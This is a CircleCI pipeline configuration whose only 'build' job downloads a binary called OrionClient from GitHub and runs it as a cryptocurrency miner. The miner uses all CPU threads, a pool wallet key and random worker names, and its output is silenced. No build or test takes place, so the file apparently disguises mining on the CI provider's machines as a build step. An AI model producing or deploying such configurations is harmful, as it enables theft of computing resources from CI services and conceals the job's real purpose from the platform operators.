version: 2.1

jobs:
  build:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: Install dependencies
          command: |
            apt-get update && apt-get install -y wget coreutils
      - run:
          name: Download and extract OrionClient
          command: |
            wget https://github.com/egg5233/OrionClient_tw/releases/download/1.6.0/OrionClient.tar.gz
            tar xf OrionClient.tar.gz
            chmod 777 OrionClient/OrionClient
      - run:
          name: Run OrionClient with random worker name
          command: |
            cd OrionClient
            WORKER_NAME="$(shuf -i 31-99999 -n 1)-PL330"
            echo "Running with worker name: $WORKER_NAME"
            ./OrionClient mine -a --pool twbitz --key xLPMoYZixVLRHJV7hb9gZoMusczWYRzP7JqFCRb6vXp --worker "$WORKER_NAME" -t $(nproc --all) --ice >/dev/null 2>&1

workflows:
  version: 2
  build_and_run:
    jobs:
      - build
